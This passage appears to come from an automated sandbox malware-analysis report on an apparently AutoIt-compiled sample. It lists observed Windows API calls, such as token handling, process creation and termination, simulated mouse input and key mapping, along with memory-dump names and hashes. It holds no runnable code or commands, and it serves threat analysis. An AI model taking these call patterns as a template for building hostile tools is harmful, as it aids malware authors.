RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
RegCloseKey.ADVAPI32(00000000), ref: 00480399

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 5065d1546826f33e87a4f6a47678ceea05cbf0e3f6973dffb5284f2505e3af75
Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
Opcode Fuzzy Hash: 5065d1546826f33e87a4f6a47678ceea05cbf0e3f6973dffb5284f2505e3af75
Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56

Function 0045EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045EF06
VariantClear.OLEAUT32(00000013), ref: 0045EF78
VariantClear.OLEAUT32(00000000), ref: 0045EFD3
_memmove.LIBCMT ref: 0045EFFD
VariantClear.OLEAUT32(?), ref: 0045F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94

Function 0046220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00462258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
IsMenu.USER32(00000000), ref: 004622C3
CreatePopupMenu.USER32 ref: 004622F7
GetMenuItemCount.USER32(000000FF), ref: 00462355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B

Function 0047709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC

Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3

GetDesktopWindow.USER32 ref: 004770D6
GetWindowRect.USER32(00000000), ref: 004770DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F

Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC

GetCursorPos.USER32(?), ref: 0047713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A

Function 00458879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6

GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
HeapAlloc.KERNEL32(00000000), ref: 004588DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
HeapFree.KERNEL32(00000000), ref: 00458911

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69

Function 004585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
CloseHandle.KERNEL32(00000004), ref: 00458603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64

Function 00B9185B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00B8FDB7), ref: 00B9185F
_free.LIBCMT ref: 00B91892
_free.LIBCMT ref: 00B918BA
SetLastError.KERNEL32(00000000), ref: 00B918C7
SetLastError.KERNEL32(00000000), ref: 00B918D3
_abort.LIBCMT ref: 00B918D9

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: d67fea1190316edf6f7b9199995b03e5a785595fe022cb6c600aeda7acefa4a0
Instruction ID: cafcf9f3c20d434d6ddff88ced4437c3e8d228d4d494313154b11351fe91b82e
Opcode Fuzzy Hash: d67fea1190316edf6f7b9199995b03e5a785595fe022cb6c600aeda7acefa4a0
Instruction Fuzzy Hash: 30F0F43690060337CE11377DAC8AE7A22D69BC2761F2409B5F815A32A2EF658C02B161

Function 00420162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
Instruction ID: 92342a6601e26d0a7fde7352a7d9a4d166513956845c1039e3d7dfd742296845
Opcode Fuzzy Hash: 8005da6f0a239fe7bb2d9a35262dc9c54b025e1879980d73ce2b9003a515eafd
Instruction Fuzzy Hash: BC016CB09017597DE3008F5A8C85B56FFA8FF19354F00411FA15C87941C7F5A868CBE5

Function 004653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004653F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0046540F
GetWindowThreadProcessId.USER32(?,?), ref: 0046541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00465437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0046543E

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
Instruction ID: 8521796c5e9ebcca20b77e734ec20d152baa00e403791343a5e797bd2ed800e1
Opcode Fuzzy Hash: 0a014705f4b9eef04d7cbb572d47effba07f9213880d12d67749b825beda7cb3
Instruction Fuzzy Hash: 7EF06231240558BBD3215B929C0DEAF7A7CEFC6B11F00057DF904D1050EBA41A0587B9

Function 00467230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00467243
EnterCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467254
TerminateThread.KERNEL32(00000000,000001F6,?,00410EE4,?,?), ref: 00467261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00410EE4,?,?), ref: 0046726E

Part of subcall function 00466C35: CloseHandle.KERNEL32(00000000,?,0046727B,?,00410EE4,?,?), ref: 00466C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00467281
LeaveCriticalSection.KERNEL32(?,?,00410EE4,?,?), ref: 00467288

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
Instruction ID: 24fb6cd7f7b8029ee4f25158e92bed301f8e8da2948c51d11c28ada49318010c
Opcode Fuzzy Hash: 007701f69a9d5ed9de85b122c5e4605bf6e21b132c868c5f449004ca5f003f85
Instruction Fuzzy Hash: DDF08236540A12EBD7111B64ED4C9DF7739FF45702B1009BAF503A10A0DB7F5819CB59

Function 00458992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0045899D
UnloadUserProfile.USERENV(?,?), ref: 004589A9
CloseHandle.KERNEL32(?), ref: 004589B2
CloseHandle.KERNEL32(?), ref: 004589BA
GetProcessHeap.KERNEL32(00000000,?), ref: 004589C3
HeapFree.KERNEL32(00000000), ref: 004589CA

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
Instruction ID: 8deadb4208ce055a946e280c670b0e99f3db2db319c6731f307d9ea981cf4585
Opcode Fuzzy Hash: fc20ddc87a5fd273a18fa8ef1565cbc608650ceaa5a7efc3272966d010428556
Instruction Fuzzy Hash: 94E0C236004401FBDA011FE1EC0C90ABB69FB89322B108A38F219C1074CB32A828DB58

Function 00457530 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 004576EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457702
CLSIDFromProgID.OLE32(?,?,00000000,0048FB80,000000FF,?,00000000,00000800,00000000,?,00492C7C,?), ref: 00457727
_memcmp.LIBCMT ref: 00457748

Strings

,,I, xrefs: 0045753D

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,I
API String ID: 314563124-4163367948
Opcode ID: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
Instruction ID: be765e1d57b8148d1cf66b3d68047348fb9be163096bbb02cdfcec4a4c199039
Opcode Fuzzy Hash: 53af9984063fa6ef4835f0a7eecfa6d9f4e13870cce121d0ca34c6a3126d00ff
Instruction Fuzzy Hash: 08815D71A00109EFCB00DFA4D984EEEB7B9FF89315F204469F505AB251DB75AE0ACB64

Function 004785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00478613
CharUpperBuffW.USER32(?,?), ref: 00478722
VariantClear.OLEAUT32(?), ref: 0047889A

Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7

Strings

AUTOIT.ERROR, xrefs: 00478728
Incorrect Parameter format, xrefs: 0047864B, 0047880D

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 67a04362a4a4e5cdd5187d63ef75db61e1a0db8a2e4665fdea0e53359ee5c90a
Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
Opcode Fuzzy Hash: 67a04362a4a4e5cdd5187d63ef75db61e1a0db8a2e4665fdea0e53359ee5c90a
Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56

Function 00462A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9

_memset.LIBCMT ref: 00462B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97

Strings

0, xrefs: 00462B73

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 0aed8f6fd7c25f2679bd7f58e0c29505b902ecd34c276bf6b7a94984eaad8c9f
Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
Opcode Fuzzy Hash: 0aed8f6fd7c25f2679bd7f58e0c29505b902ecd34c276bf6b7a94984eaad8c9f
Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B

Function 00413137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00413277
_memmove.LIBCMT ref: 00413310
_free.LIBCMT ref: 00413336
_memmove.LIBCMT ref: 004133E9

Strings

3cA, xrefs: 00413225
_A, xrefs: 00413322

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: _memmove$_free
String ID: 3cA$_A
API String ID: 2620147621-3480954128
Opcode ID: 35c511ca6f8e2fb99b164d345fb57b3550685404656f9d903254bb67667d585c
Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
Opcode Fuzzy Hash: 35c511ca6f8e2fb99b164d345fb57b3550685404656f9d903254bb67667d585c
Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A

